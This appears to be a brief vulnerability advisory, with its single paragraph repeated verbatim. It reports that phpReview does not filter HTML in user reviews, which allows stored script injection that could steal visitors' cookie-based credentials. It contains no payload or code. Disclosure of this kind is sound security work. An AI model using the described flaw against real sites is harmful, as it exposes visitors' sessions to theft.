VULHUB ™

phpReview is a freely available, open-source customizable web "reviewing" application. It allows users to enter and maintain reviews of such things as books, films, etc. phpReview does not filter HTML tags from user-submitted reviews. As a result, it is possible for a malicious user to include script code in reviews. The script code will be executed on web users, who browse reviews. The malicious script code will appear to originate from the website running the software. This issue opens up web users to cross-agent scripting attacks and may potentially be leveraged to do such things as steal cookie-based authentication credentials.

phpReview is a freely available, open-source customizable web "reviewing" application. It allows users to enter and maintain reviews of such things as books, films, etc. phpReview does not filter HTML tags from user-submitted reviews. As a result, it is possible for a malicious user to include script code in reviews. The script code will be executed on web users, who browse reviews. The malicious script code will appear to originate from the website running the software. This issue opens up web users to cross-agent scripting attacks and may potentially be leveraged to do such things as steal cookie-based authentication credentials.